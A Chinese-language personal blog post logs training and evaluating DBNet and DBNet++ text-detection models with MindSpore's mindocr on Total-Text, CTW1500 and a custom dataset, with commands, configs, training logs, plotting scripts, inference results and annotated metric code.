    --image_dir ./data/ocr_datasets/ctw1500/train_images/ \
    --label_dir ./data/ocr_datasets/ctw1500/ctw1500_train_labels/ \
    --output_path ./data/ocr_datasets/ctw1500/train_det_gt.txt
    • Test
    python tools/dataset_converters/convert.py \
    --dataset_name ctw1500 \
    --task det \
    --image_dir ./data/ocr_datasets/ctw1500/test_images/ \
    --label_dir ./data/ocr_datasets/ctw1500/gt_ctw1500/ \
    --output_path ./data/ocr_datasets/ctw1500/test_det_gt.txt

    自己的数据集

    将自己的数据集转换成 totaltext 的格式:

    • Train
    python tools/dataset_converters/convert.py \
    --dataset_name totaltext \
    --task det \
    --image_dir ./data/ocr_datasets/blendertext/images/Train/ \
    --label_dir ./data/ocr_datasets/blendertext/Txts/Train/ \
    --output_path ./data/ocr_datasets/blendertext/train_det_gt.txt
    • Test
    python tools/dataset_converters/convert.py \
    --dataset_name totaltext \
    --task det \
    --image_dir ./data/ocr_datasets/blendertext/images/Test \
    --label_dir ./data/ocr_datasets/blendertext/Txts/Test \
    --output_path ./data/ocr_datasets/blendertext/test_det_gt.txt

    训练

    db_r18_totaltext(效果没有官网说的那么好但还是能用)(7.12-7.14)

    ​ 先修改 config configs/det/dbnet/db_r18_totaltext.yaml 里的数据集路径(我本来不想修改的,结果发现它默认是个绝对路径且不在 work 中,那必须改了)

    ​ 将 train: dataset:test: dataset: 下的 dataset_root 调整为自己的数据集路径,我这里是:

    dataset_root: ./data/ocr_datasets
    单卡训练(成)

    单卡训练(请确保 yaml 文件中的 distribute 参数为 False。(emmmm 但好像 True 也不会影响。))

    # train dbnet on totaltext dataset
    python tools/train.py --config configs/det/dbnet/db_r18_totaltext.yaml
    [2023-07-12 16:40:01] mindocr.train INFO - Standalone training. Device id: 0, specified by system.device_id in yaml config file or is default value 0.
    [2023-07-12 16:40:07] mindocr.data.builder INFO - Creating dataloader (training=True) for device 0. Number of data samples: 1255
    [2023-07-12 16:40:10] mindocr.data.builder INFO - Creating dataloader (training=False) for device 0. Number of data samples: 300
    [2023-07-12 16:40:13] mindocr.models.backbones.mindcv_models.utils INFO - Finish loading model checkpoint from: /home/ma-user/.mindspore/models/resnet18-1e65cd21.ckpt
    [2023-07-12 16:40:13] mindocr.models.utils.load_model INFO - Finish loading model checkoint from https://download.mindspore.cn/toolkits/mindocr/dbnet/dbnet_resnet18_synthtext-251ef3dd.ckpt. If no parameter fail-load warning displayed, all checkpoint params have been successfully loaded.
    [2023-07-12 16:40:13] mindocr.optim.param_grouping INFO - no parameter grouping is applied.
    [2023-07-12 16:40:20] mindocr.train INFO -
    ========================================
    Distribute: False
    Model: det_resnet18-DBFPN-DBHead
    Total number of parameters: 12351042
    Total number of trainable parameters: 12340930
    Data root: ./data/ocr_datasets
    Optimizer: SGD
    Weight decay: 0.0001
    Batch size: 20
    Num devices: 1
    Gradient accumulation steps: 1
    Global batch size: 20x1x1=20
    LR: 0.007
    Scheduler: polynomial_decay
    Steps per epoch: 62
    Num epochs: 1200
    Clip gradient: False
    EMA: True
    AMP level: O0
    Loss scaler: {'type': 'dynamic', 'loss_scale': 512, 'scale_factor': 2, 'scale_window': 1000}
    Drop overflow update: False
    ========================================

    Start training... (The first epoch takes longer, please wait...)

    [2023-07-12 16:42:13] mindocr.utils.callbacks INFO - epoch: [1/1200], loss: 2.851490, epoch time: 113.039s, per step time: 1823.213ms, fps per card: 10.97 img/s

    ​ 妈了个巴子,README.md 写的不清不楚的,终于能跑了。不过这个 first epoch takes longer 真的够 longer……

    笑死大半夜实验室电脑寄了还让我学了怎么断点续训

    ​ 训练到一半 Moba 居然还崩溃了?还得整个断点续训 orz:docs/cn/tutorials/advanced_train.md · MindSpore Lab/mindocr - Gitee.com

    ​ 往 db_r18_totaltext.yaml 里的 model: 下添加:

    resume: True

    png

    ​ 然后再:

    python tools/train.py --config configs/det/dbnet/db_r18_totaltext.yaml

    ​ 会提示:

    Resume train from epoch: 1049

    ​ 就可以继续了!

    分析训练结果

    ​ 最后结果:

    [2023-07-14 10:27:56] mindocr.utils.callbacks INFO - => Best f-score: 0.8407643312101911
    Training completed!
    [2023-07-14 10:27:56] mindocr.utils.callbacks INFO - Top K checkpoints:
    f-score checkpoint
    0.8408 ./tmp_det/e1110.ckpt
    0.8401 ./tmp_det/e1090.ckpt
    0.8397 ./tmp_det/e1086.ckpt
    0.8397 ./tmp_det/e1089.ckpt
    0.8394 ./tmp_det/e1126.ckpt
    0.8392 ./tmp_det/e1132.ckpt
    0.8392 ./tmp_det/e1149.ckpt
    0.8390 ./tmp_det/e1152.ckpt
    0.8389 ./tmp_det/e1129.ckpt
    0.8389 ./tmp_det/e1139.ckpt

    ​ 从 tmp_dbt/ 中可以看到输出的结果,炼出的丹,日志信息等。

    ​ 第 1110 个 epoch 的丹性能最好!

    EpochLossRecallPrecisionF-score
    11101.13984583.43%84.73%84.08%

    ​ emmmm 官网的最终效果为:

    模型环境配置骨干网络预训练数据集RecallPrecisionF-score训练时间吞吐量配置文件模型权重下载
    DBNetD910x1-MS2.0-GResNet-18SynthText83.66%87.65%85.61%12.9s/epoch96.9 img/syamlckpt

    ​ 写一个 python 读取 result.log 并画出图表:

    import matplotlib.pyplot as plt

    data = [[], [], [], [], [], []]
    epochs = 0
    with open('result.log', 'r') as file:
    lines = file.readlines()
    epochs = len(lines) - 1
    for line in lines[1:]:
    for i in range(1, len(line.strip().split())):
    data[i-1].append(float(line.strip().split()[i]))

    fig, axs = plt.subplots(nrows=2, ncols=3)

    for i, ax in enumerate(axs.flat):
    ax.plot(range(1, epochs + 1), data[i])
    ax.set_xticks([0, epochs * 1 / 3, epochs * 2 / 3, epochs])
    ax.set_title(lines[0][:-1].split('\t')[i + 1])
    ax.set_xlabel('Epoch')
    ax.set_ylabel('')

    plt.tight_layout()

    plt.show()

    png

    ​ 可以看到

    • loss 逐渐下降
    • recall 逐渐接近于 1
    • precision 逐渐下降?这好吗(ChatGPT 说这是正常的)

    在训练深度神经网络时,precision(精确度)和 f-score(F1 分数)是衡量分类模型性能的指标。

    • 精确度(precision)是指被正确预测为正例的样本数占所有被预测为正例的样本数的比例。它衡量了模型在预测为正例时的准确性。
    • F1 分数(F1-score)则是同时考虑了召回率(recall)和精确度的指标,它是精确度和召回率的调和平均值。F1 分数越接近于 1 表示模型在保持高精确度和高召回率方面表现良好。

    当训练过程中,随着训练的进行,精确度下降但是 F1 分数逐渐趋近于 1 的情况是可能存在的,尤其是当模型更注重于增加召回率(即尽可能捕捉到更多的正例)时。这种情况通常发生在数据标签不平衡、类别不均衡或存在较高的假阳性或假阴性的情况下。

    此时,模型可能会将更多的样本预测为正例,导致假阳性增加,从而降低了精确度。然而,由于模型的预测更加倾向于正例,它也能更好地捕捉到真正的正例,并提高召回率。因此,F1 分数可能会逐渐趋近于 1,指示模型在整体上仍然具有较好的分类性能。

    需要注意的是,对于具体的问题和数据集,还需要根据具体情况进行分析和评估,以确定模型的性能是否符合预期要求。

    • f-score 逐渐接近于 1

    • 一开始 train_time 就会很慢,执行到 1049 的时候重启训练耗费了好多时间 orz

    原文中第 800 个 epoch 时的性能:

    MethodPRF
    DB-ResNet-18 (800)88.377.982.8

    查看 result.log 中第 800 个 epoch 时的性能:

    MethodPRF
    DB-ResNet-18 (800)85.083.284.0

    ​ 好家伙训练一个这玩意扣我 665 多块钱……

    分布式训练(寄)

    ​ 还得装 openmpi 4.0.3 (for distributed training/evaluation)

    ​ 下载 https://download.open-mpi.org/release/open-mpi/v4.0/openmpi-4.0.3.tar.gz 拷贝到服务器中,然后一阵操作:

    gunzip -c openmpi-4.0.3.tar.gz | tar xf -
    cd openmpi-4.0.3
    ./configure --prefix=/usr/local
    <...lots of output...>
    make all install

    然后就会喜提安装失败。

    找了工作人员,还没得到解决方案……


    改天试试 RANK_TABLE_FILE 方法。

    db_r18_ctw1500(能跑但是没有跑完)(7.14)

    ​ 先修改 config configs/det/dbnet/db_r18_ctw1500.yaml 里的数据集路径:

    ​ 将 train: dataset:test: dataset: 下的 dataset_root 调整为自己的数据集路径:

    dataset_root: ./data/ocr_datasets

    ​ 开跑!

    python tools/train.py --config configs/det/dbnet/db_r18_ctw1500.yaml
    [2023-07-14 10:57:25] mindocr.models.utils.load_model INFO - Finish loading model checkoint fro                                                                m https://download.mindspore.cn/toolkits/mindocr/dbnet/dbnet_resnet18_synthtext-251ef3dd.ckpt.                                                                 If no parameter fail-load warning displayed, all checkpoint params have been successfully loade                                                                d.
    [2023-07-14 10:57:25] mindocr.optim.param_grouping INFO - no parameter grouping is applied.
    [2023-07-14 10:57:31] mindocr.train INFO -
    ========================================
    Distribute: False
    Model: det_resnet18-DBFPN-DBHead
    Total number of parameters: 12351042
    Total number of trainable parameters: 12340930
    Data root: ./data/ocr_datasets
    Optimizer: SGD
    Weight decay: 0.0001
    Batch size: 20
    Num devices: 1
    Gradient accumulation steps: 1
    Global batch size: 20x1x1=20
    LR: 0.007
    Scheduler: polynomial_decay
    Steps per epoch: 50
    Num epochs: 1200
    Clip gradient: False
    EMA: False
    AMP level: O0
    Loss scaler: {'type': 'dynamic', 'loss_scale': 512, 'scale_factor': 2, 'scale_window': 1000}
    Drop overflow update: False
    ========================================

    Start training... (The first epoch takes longer, please wait...)

    [WARNING] MD(9900,fffb197fa1e0,python):2023-07-14-10:58:45.969.430 [mindspore/ccsrc/minddata/da taset/engine/datasetops/data_queue_op.cc:832] DetectPerBatchTime] Bad performance attention, it takes more than 25 seconds to fetch a batch of data from dataset pipeline, which might result `GetNext` timeout problem. You may test dataset processing performance(with creating dataset it erator) and optimize it.
    [2023-07-14 10:59:43] mindocr.utils.callbacks INFO - epoch: [1/1200], loss: 2.689226, epoch tim e: 132.242 s, per step time: 2644.840 ms, fps per card: 7.56 img/s
    100%|████████████████████████████████████████████████████████| 500/500 [00:59<00:00, 8.42it/s]
    [2023-07-14 11:00:43] mindocr.utils.callbacks INFO - Performance: {'recall': 0.8184523809523809 , 'precision': 0.8520526723470179, 'f-score': 0.8349146110056926}, eval time: 59.41374802589416 5
    [2023-07-14 11:00:43] mindocr.utils.callbacks INFO - => Best f-score: 0.8349146110056926, check point saved.

    ​ 可是我想整个服务器后台执行,避免之前实验室电脑 Moba 大半夜掉线的尴尬:

    nohup python tools/train.py --config configs/det/dbnet/db_r18_ctw1500.yaml > test_db_r18_ctw1500.log 2>&1 &
    • 最后一个“&”表示后台运行程序

    • “nohup” 表示程序不被挂起

    • “python”表示执行 python 代码

    • “-u”表示不启用缓存,实时输出打印信息到日志文件(如果不加 -u,则会导致日志文件不会实时刷新代码中的 print 函数的信息)

    • test.py”表示 python 的源代码文件(根据自己的文件修改)

    • “test.log”表示输出的日志文件(自己修改,名字自定)

    • “>”表示将打印信息重定向到日志文件

    • “2>&1”表示将标准错误输出转变化标准输出,可以将错误信息也输出到日志文件中(0-> stdin, 1->stdout, 2->stderr)

    ​ 最牛逼的伟哥提示道:

    不过这种方法 你想中途终止的话 你只能用 kill 杀掉进程来解决了

    不然只能等到运行结束

    ​ 那么直接重启服务器也是可以的。

    8.2 重跑!

    db++_r18_totaltext(魔改)(7.16)

    原仓库没有这个选项,试试直接给 db_r18_totaltext.yaml 里填上

    use_asf: True             # Adaptive Scale Fusion
    channel_attention: True # Use channel attention in ASF

    开跑!

    nohup python tools/train.py --config configs/det/test_dbnet/db++_r18_totaltext.yaml > test_db++_r18_totaltext.log 2>&1 &

    分析下结果:

    import matplotlib.pyplot as plt

    data = [[], [], [], [], [], []]
    epochs = 0
    with open('result.log', 'r') as file:
    lines = file.readlines()
    epochs = len(lines) - 1
    for line in lines[1:]:
    for i in range(1, len(line.strip().split())):
    data[i-1].append(float(line.strip().split()[i]))

    fig, axs = plt.subplots(nrows=2, ncols=3)

    for i, ax in enumerate(axs.flat):
    ax.plot(range(1, epochs + 1), data[i])
    ax.set_xticks([0, epochs * 1 / 3, epochs * 2 / 3, epochs])
    ax.set_title(lines[0][:-1].split('\t')[i + 1])
    ax.set_xlabel('Epoch')
    ax.set_ylabel('')

    plt.tight_layout()

    plt.show()

    png

    统计下前 10 epoch 下的 F-score 值:

    def get_top_10(lst):
    # 使用 enumerate() 函数同时迭代列表中的值和索引
    enumerated_lst = list(enumerate(lst))

    # 对列表中的元素按值进行排序
    sorted_lst = sorted(enumerated_lst, key=lambda x: x[1], reverse=True)

    # 获取排序后的前10个元素及其序号
    top_10 = sorted_lst[:10]

    return top_10

    # 调用函数获取最大的 10 个值及其序号
    result = get_top_10(data[3])

    # 输出结果
    for index, value in result:
    print(f"epoch: {index + 1}, F-score: {value}")
    epoch: 205, F-score: 0.8386
    epoch: 217, F-score: 0.8376
    epoch: 216, F-score: 0.8375
    epoch: 402, F-score: 0.8372
    epoch: 224, F-score: 0.8371
    epoch: 209, F-score: 0.837
    epoch: 230, F-score: 0.8369
    epoch: 404, F-score: 0.8369
    epoch: 223, F-score: 0.8368
    epoch: 269, F-score: 0.8368

    emmmm 虽然 loss 一直在下降,但是 F-score 很早就趋于稳定了。但是最终的训练结果还不如 db_r18_totaltext?什么鬼啊!


    原文中第 800 个 epoch 时的性能:

    MethodPRF
    DB-ResNet-18++ (800)84.381.082.6

    查看 result.log 中第 800 个 epoch 时的性能:

    MethodPRF
    DB-ResNet-18++ (800)85.681.483.4

    原文中第 1024 个 epoch 时的性能:

    MethodPRF
    DB-ResNet-18++ (1024)86.781.383.9

    查看 result.log 中第 1024 个 epoch 时的性能:

    MethodPRF
    DB-ResNet-18++ (1024)84.981.383.0

    笑死,效果还不如第 800 个 epoch。

    db++_r18_ctw1500(8.4)

    nohup python tools/train.py --config configs/det/test_dbnet/db++_r18_ctw1500.yaml > test_db++_r18_ctw1500.log 2>&1 &

    db_r50_totaltext(7.27)

    nohup python tools/train.py --config configs/det/dbnet/db_r50_totaltext.yaml > test_db_r50_totaltext.log 2>&1 &

    分析下结果:

    png

    db_r50_ctw1500(8.3)

    nohup python tools/train.py --config configs/det/test_dbnet/db_r50_ctw1500.yaml > test_db_r50_ctw1500.log 2>&1 &

    db++_r50_totaltext(魔改)

    炼出了个不知道什么玩意儿(7.15-7.16)

    原仓库没有这个选项,作死根据 db++_r50_icdar15.yamldb_r50_totaltext.yaml 魔改成一个 db++_r50_totaltext.yaml,DB++ 与 DB 的区别就是

    use_asf: True             # Adaptive Scale Fusion
    channel_attention: True # Use channel attention in ASF

    这两行的区别:

    system:
    mode: 0 # 0 for graph mode, 1 for pynative mode in MindSpore
    distribute: False
    amp_level: 'O0'
    seed: 42
    log_interval: 10
    val_while_train: True
    val_start_epoch: 800
    drop_overflow_update: False

    model:
    type: det
    transform: null
    backbone:
    name: det_resnet50
    pretrained: False
    neck:
    name: DBFPN
    out_channels: 256
    bias: False
    use_asf: True # Adaptive Scale Fusion
    channel_attention: True # Use channel attention in ASF
    head:
    name: DBHead
    k: 50
    bias: False
    adaptive: True
    pretrained: https://download.mindspore.cn/toolkits/mindocr/dbnet/dbnet_resnet50_synthtext-40655acb.ckpt

    postprocess:
    name: DBPostprocess
    box_type: quad # whether to output a polygon or a box
    binary_thresh: 0.3 # binarization threshold
    box_thresh: 0.7 # box score threshold
    max_candidates: 1000
    expand_ratio: 1.5 # coefficient for expanding predictions

    ...

    optimizer:
    opt: momentum
    filter_bias_and_bn: false
    momentum: 0.9
    weight_decay: 1.0e-4

    ...

    train:
    ema: True
    ckpt_save_dir: './tmp_det_db++_r50_totaltext'
    dataset_sink_mode: True
    dataset:
    type: DetDataset
    dataset_root: ./data/ocr_datasets
    data_dir: totaltext/images/Train
    label_file: totaltext/train_det_gt.txt

    ...

    eval:
    ckpt_load_path: tmp_det_db++_r50_totaltext/best.ckpt
    dataset_sink_mode: False
    dataset:
    type: DetDataset
    dataset_root: ./data/ocr_datasets
    data_dir: totaltext/images/Test
    label_file: totaltext/test_det_gt.txt
    sample_ratio: 1.0

    ...

    开跑!(魔改的后的 db++_r50_totaltext.yaml 放在了 test_dbnet/ 下)

    nohup python tools/train.py --config configs/det/test_dbnet/db++_r50_totaltext.yaml > test_db++_r50_totaltext.log 2>&1 &
    ========================================
    Distribute: False
    Model: det_resnet50-DBFPN-DBHead
    Total number of parameters: 25613196
    Total number of trainable parameters: 25559564
    Data root: ./data/ocr_datasets
    Optimizer: momentum
    Weight decay: 0.0001
    Batch size: 32
    Num devices: 1
    Gradient accumulation steps: 1
    Global batch size: 32x1x1=32
    LR: 0.007
    Scheduler: polynomial_decay
    Steps per epoch: 39
    Num epochs: 1200
    Clip gradient: False
    EMA: True
    AMP level: O0
    Loss scaler: {'type': 'dynamic', 'loss_scale': 512, 'scale_factor': 2, 'scale_window': 1000}
    Drop overflow update: False
    ========================================

    笑死真的能跑。


    7.16 结果到 800 个 epoch,需要评估的时候还是寄了。

    RuntimeError: Single op compile failed, op: assign_3372008743488672465_0.

    断点重训又能跑了?好奇怪。

    发现 F 分数好低,绝,感觉这个丹炼废了,Ctrl + Z,先搁置吧。

    png

    重跑(7.26)

    试试直接给 db_r50_totaltext.yaml 里填上

    use_asf: True             # Adaptive Scale Fusion
    channel_attention: True # Use channel attention in ASF

    开跑!

    nohup python tools/train.py --config configs/det/test_dbnet/db++_r50_totaltext.yaml > test_db++_r50_totaltext.log 2>&1 &

    分析下结果:

    png

    最好的前 10 个模型:

    [2023-07-27 05:32:23] mindocr.utils.callbacks INFO - Top K checkpoints:
    f-scorecheckpoint
    0.8546./tmp_det_db++_r50_totaltext/e584.ckpt
    0.8544./tmp_det_db++_r50_totaltext/e616.ckpt
    0.8543./tmp_det_db++_r50_totaltext/e745.ckpt
    0.8542./tmp_det_db++_r50_totaltext/e582.ckpt
    0.8542./tmp_det_db++_r50_totaltext/e623.ckpt
    0.8541./tmp_det_db++_r50_totaltext/e744.ckpt
    0.8541./tmp_det_db++_r50_totaltext/e620.ckpt
    0.8540./tmp_det_db++_r50_totaltext/e741.ckpt
    0.8540./tmp_det_db++_r50_totaltext/e615.ckpt
    0.8540./tmp_det_db++_r50_totaltext/e747.ckpt

    这个算是性能最好的一个丹了。


    原文中第 800 个 epoch 时的性能:

    MethodPRF
    DB-ResNet-50++ (800)87.982.885.3

    查看 result.log 中第 800 个 epoch 时的性能:

    MethodPRF
    DB-ResNet-50++ (800)86.383.985.1

    原文中第 1024 个 epoch 时的性能:

    MethodPRF
    DB-ResNet-50++ (1024)88.582.085.1

    查看 result.log 中第 1024 个 epoch 时的性能:

    MethodPRF
    DB-ResNet-50++ (1024)85.883.484.6

    db++_r50_ctw1500(8.5)

    nohup python tools/train.py --config configs/det/test_dbnet/db++_r50_ctw1500.yaml > test_db++_r50_ctw1500.log 2>&1 &

    自己的数据集(8.24)

    nohup python tools/train.py --config configs/det/test_dbnet/db_r18_blendertext.yaml > test_db_r18_blendertext.log 2>&1 &

    推理(7.26、7.29)

    离线推理只能用于 昇腾310,但是服务器是 昇腾910,所以寄

    折磨完华为工作人员后说可以使用在线推理,设置好 --image_dir--det_algorithm--det_model_dir,然后开跑!

    但是发现这个推理只支持 resnet50?拉了。

    居然只支持画矩形框?天呐。

    Ground Truth

    • 0999.jpg

    jpg

    • Ground Truth
    0999.jpg[{"transcription": "CHILDREN'S HOSPITAL", "points": [[57, 240], [104, 247], [151, 248], [198, 251], [245, 250], [292, 250], [340, 247], [343, 263], [295, 265], [247, 267], [199, 268], [152, 265], [104, 263], [57, 261]]}]

    官网模型

    dbnet_resnet50_td500-0d12b5e8.ckpt

    从官网下载的训练好的模型:configs/det/dbnet/README_CN.md · MindSpore Lab/mindocr - Gitee.com 里的 dbnet_resnet50_td500-0d12b5e8.ckpt

    python tools/infer/text/predict_det.py --image_dir ./data/ocr_datasets/ctw1500/train_images/0999.png \
    --det_algorithm DB \
    --det_model_dir ./dbnet_resnet50_td500-0d12b5e8.ckpt \
    --draw_img_save_dir ./inference_results/
    [2023-07-29 10:54:44] mindocr.models.backbones.mindcv_models.utils INFO - Finish loading model checkpoint from: /home/ma-user/.mindspore/models/resnet50-e0733ab8.ckpt
    [2023-07-29 10:54:45] mindocr.models.utils.load_model INFO - Finish loading model checkoint from ./dbnet_resnet50_td500-0d12b5e8.ckpt. If no parameter fail-load warning displayed, all checkpoint params have been successfully loaded.
    [2023-07-29 10:54:45] mindocr INFO - Init detection model: DB --> dbnet_resnet50. Model weights loaded from ./dbnet_resnet50_td500-0d12b5e8.ckpt
    [2023-07-29 10:54:45] mindocr INFO - Pick optimal preprocess hyper-params for det algo DB:
    {'DetResize': {'target_size': None, 'keep_ratio': True, 'limit_side_len': 960, 'limit_type': 'max', 'padding': False, 'force_divisable': True}}
    [2023-07-29 10:54:45] mindocr.data.transforms.det_transforms INFO - `limit_type` is max. Image will be resized by limiting the max side length to 960.
    [2023-07-29 10:54:45] mindocr INFO -
    Infering [1/1]: data/ocr_datasets/ctw1500/train_images/0999.jpg
    [2023-07-29 10:54:45] mindocr INFO - Original image shape: (378, 620, 3)
    [2023-07-29 10:54:45] mindocr INFO - After det preprocess: (3, 384, 640)
    [2023-07-29 10:55:08] mindocr INFO - Num detected text boxes: 2
    [2023-07-29 10:55:08] mindocr INFO - Done! Text detection results saved in ./inference_results/

    会在 inference_results/ 里获得 0999_det_res.pngdet_results.txt

    • det_results.txt
    0999.jpg[[[226, 253], [342, 249], [342, 262], [226, 266]], [[67, 243], [209, 252], [208, 268], [66, 259]]]
    • 0999_det_res.png

    png

    自己的丹

    tmp_det_db_r50_totaltext/best.ckpt
    python tools/infer/text/predict_det.py --image_dir ./data/ocr_datasets/ctw1500/train_images/0999.png \
    --det_algorithm DB \
    --det_model_dir ./tmp_det_db_r50_totaltext/best.ckpt \
    --draw_img_save_dir ./tmp_det_db_r50_totaltext/inference_results/
    • det_results.txt
    0999.jpg[[[221, 247], [345, 243], [346, 270], [222, 275]], [[55, 237], [210, 248], [208, 275], [53, 264]]]
    • 0999_det_res.png

    png

    居然差这么多……感觉参数不太一样……

    tmp_det_db++_r50_totaltext/best.ckpt
    python tools/infer/text/predict_det.py --image_dir ./data/ocr_datasets/ctw1500/train_images/0999.png \
    --det_algorithm DB \
    --det_model_dir ./tmp_det_db++_r50_totaltext/best.ckpt \
    --draw_img_save_dir ./tmp_det_db++_r50_totaltext/inference_results/
    • det_results.txt
    0999.jpg[[[224, 248], [345, 244], [346, 267], [225, 272]], [[55, 239], [208, 247], [206, 274], [54, 266]]]

    可用参数

    查看 tools/infer/text/config.py,有如下参数可用:

    def create_parser():
    parser_config = argparse.ArgumentParser(description="Inference Config File", add_help=False)
    parser_config.add_argument(
    "-c", "--config", type=str, default="", help='YAML config file specifying default arguments (default="")'
    )

    parser = argparse.ArgumentParser(description="Inference Config Args")
    # params for prediction engine
    parser.add_argument("--mode", type=int, default=0, help="0 for graph mode, 1 for pynative mode ") # added
    parser.add_argument("--det_model_config", type=str, help="path to det model yaml config") # added
    parser.add_argument("--rec_model_config", type=str, help="path to rec model yaml config") # added

    # params for text detector
    parser.add_argument("--image_dir", type=str, help="image path or image directory")
    # parser.add_argument("--page_num", type=int, default=0)
    parser.add_argument(
    "--det_algorithm",
    type=str,
    default="DB++",
    choices=["DB", "DB++", "DB_MV3", "PSE"],
    help="detection algorithm.",
    ) # determine the network architecture
    parser.add_argument(
    "--det_amp_level",
    type=str,
    default="O0",
    choices=["O0", "O1", "O2", "O3"],
    help="Auto Mixed Precision level. This setting only works on GPU and Ascend",
    ) # added
    parser.add_argument(
    "--det_model_dir",
    type=str,
    default=None,
    help="directory containing the detection model checkpoint best.ckpt, or path to a specific checkpoint file.",
    ) # determine the network weights
    parser.add_argument(
    "--det_limit_side_len", type=int, default=960, help="side length limitation for image resizing"
    ) # increase if need
    parser.add_argument(
    "--det_limit_type",
    type=str,
    default="max",
    choices=["min", "max"],
    help="limitation type for image resize. If min, images will be resized by limiting the minimum side length "
    "to `limit_side_len` (prior to accuracy). If max, images will be resized by limiting the maximum side "
    "length to `limit_side_len` (prior to speed). Default: max",
    )
    parser.add_argument(
    "--det_box_type",
    type=str,
    default="quad",
    choices=["quad", "poly"],
    help="box type for text region representation",
    )

    # DB parmas
    parser.add_argument("--det_db_thresh", type=float, default=0.3)
    parser.add_argument("--det_db_box_thresh", type=float, default=0.6)
    parser.add_argument("--det_db_unclip_ratio", type=float, default=1.5)
    parser.add_argument("--max_batch_size", type=int, default=10)
    parser.add_argument("--use_dilation", type=str2bool, default=False)
    parser.add_argument("--det_db_score_mode", type=str, default="fast")

    # params for text recognizer
    parser.add_argument(
    "--rec_algorithm",
    type=str,
    default="CRNN",
    choices=["CRNN", "RARE", "CRNN_CH", "RARE_CH", "SVTR"],
    help="recognition algorithm",
    )
    parser.add_argument(
    "--rec_amp_level",
    type=str,
    default="O0",
    choices=["O0", "O1", "O2", "O3"],
    help="Auto Mixed Precision level. This setting only works on GPU and Ascend",
    ) # added
    parser.add_argument(
    "--rec_model_dir",
    type=str,
    help="directory containing the recognition model checkpoint best.ckpt, or path to a specific checkpoint file.",
    ) # determine the network weights
    # parser.add_argument("--rec_image_inverse", type=str2bool, default=True)
    parser.add_argument(
    "--rec_image_shape",
    type=str,
    default="3, 32, 320",
    help="C, H, W for target image shape. max_wh_ratio=W/H will be used to control the maximum width after "
    '"aspect-ratio-kept" resizing. Set W larger for longer text.',
    )

    parser.add_argument(
    "--rec_batch_mode",
    type=str2bool,
    default=True,
    help="Whether to run recognition inference in batch-mode, which is faster but may degrade the accuracy "
    "due to padding or resizing to the same shape.",
    ) # added
    parser.add_argument("--rec_batch_num", type=int, default=8)
    parser.add_argument("--max_text_length", type=int, default=25)
    parser.add_argument(
    "--rec_char_dict_path",
    type=str,
    default=None,
    help="path to character dictionary. If None, will pick according to rec_algorithm and red_model_dir.",
    )
    # uncomment it after model trained supporting space recognition.
    # parser.add_argument("--use_space_char", type=str2bool, default=True)
    parser.add_argument("--vis_font_path", type=str, default="docs/fonts/simfang.ttf")
    parser.add_argument("--drop_score", type=float, default=0.5)
    parser.add_argument(
    "--rec_gt_path", type=str, default=None, help="Path to ground truth labels of the recognition result"
    ) # added

    #
    parser.add_argument(
    "--draw_img_save_dir",
    type=str,
    default="./inference_results",
    help="Dir to save visualization and detection/recogintion/system prediction results",
    )
    parser.add_argument(
    "--save_crop_res",
    type=str2bool,
    default=False,
    help="Whether to save images cropped from text detection results.",
    )
    parser.add_argument(
    "--crop_res_save_dir", type=str, default="./output", help="Dir to save the cropped images for text boxes"
    )
    parser.add_argument(
    "--visualize_output",
    type=str2bool,
    default=False,
    help="Whether to visualize results and save the visualized image.",
    )
    parser.add_argument("--warmup", type=str2bool, default=False)

    return parser_config, parser

    评估(8.2)

    metrics/det_metrics.py 下存储着评估协议:

    from typing import List, Tuple

    import numpy as np
    from shapely.geometry import Polygon

    import mindspore as ms
    import mindspore.ops as ops
    from mindspore import Tensor, ms_function, nn

    __all__ = ["DetMetric"]

    这段代码是一个在 mindocr(MindSpore OCR)评估模型中使用的模块。以下是对代码的解释:

    • from typing import List, Tuple:导入类型提示(Type Hints),用于指定函数参数和返回值的类型。
    • import numpy as np:导入 NumPy 库,用于进行数值计算和数组操作。
    • from shapely.geometry import Polygon:从 shapely.geometry 模块中导入 Polygon 类,用于处理多边形几何对象。
    • import mindspore as ms:导入 MindSpore 库,一个开源的深度学习框架。
    • import mindspore.ops as ops:导入 MindSpore 框架的操作模块,用于执行各种操作。
    • from mindspore import Tensor, ms_function, nn:从 MindSpore 中导入 Tensor、ms_function 和 nn,它们是 MindSpore 框架提供的一些基础类和装饰器。
    • __all__ = ["DetMetric"]:定义了一个名为 __all__ 的变量,其中包含字符串 “DetMetric”。这表示该模块中只导出 DetMetric 类,其他变量和函数不会被导入。

    这段代码主要是导入所需的依赖库和模块,为之后的代码提供必要的支持。在 MindOCR 评估模型中,这些导入的模块和类可能用于数据处理、模型定义、评估和计算等方面的操作。

    def _get_intersect(pd, pg):
    return pd.intersection(pg).area

    这段代码定义了一个名为 _get_intersect 的函数,该函数接受两个参数 pdpg,并返回它们的交集面积。

    • pdpg 参数都是多边形(Polygon)对象,可能是由 shapely.geometry.Polygon 创建的。
    • pd.intersection(pg) 表示计算 pdpg 的交集,返回一个新的多边形对象。
    • .area 是对交集多边形对象调用的方法,用于计算其面积。
    • 函数将交集多边形的面积作为结果进行返回。

    此函数的目的是计算两个多边形的交集并返回其面积。在 MindOCR 评估模型中,这个函数可能被用于计算检测框与标注框之间的交集面积,用于评估模型的准确度和性能。

    def _get_iou(pd, pg):
    return pd.intersection(pg).area / pd.union(pg).area

    这段代码定义了一个名为 _get_iou 的函数,该函数接受两个参数 pdpg,并返回它们的交并比(Intersection over Union,IoU)。

    • pdpg 参数都是多边形(Polygon)对象,可能是由 shapely.geometry.Polygon 创建的。
    • pd.intersection(pg) 表示计算 pdpg 的交集,返回一个新的多边形对象。
    • .area 是对交集多边形对象和并集多边形对象进行调用的方法,分别用于计算其面积。
    • / 运算符将两个面积相除,得到交并比(IoU)。
    • 函数将交并比作为结果进行返回。

    交并比是用于衡量两个集合重叠程度的指标。在目标检测任务中,常用于评估模型检测结果与真实标注框之间的匹配程度。在该评估模型中,_get_iou 函数可能被用于计算检测框与标注框之间的交并比,以评估模型的准确度和性能。

    class DetectionIoUEvaluator:
    """
    Converts ground truth and predicted polygon locations into binary classification labels based on
    the IoU between them. This simplifies metric calculations, such as Recall, Precision, etc.
    根据真实标注和预测多边形之间的交并比(IoU),将它们转换为二元分类标签。这简化了召回率、精确率等度量计算的过程。

    Args:
    min_iou: Minimum IoU between the ground truth and prediction to be considered as a correct prediction.
    min_iou: 在考虑为正确预测的情况下,真实标注和预测之间的最小交并比(IoU)。
    min_intersect: Minimum intersection with an ignored ground truth for the prediction to be considered as ignored
    (and thus to be excluded from further calculations).
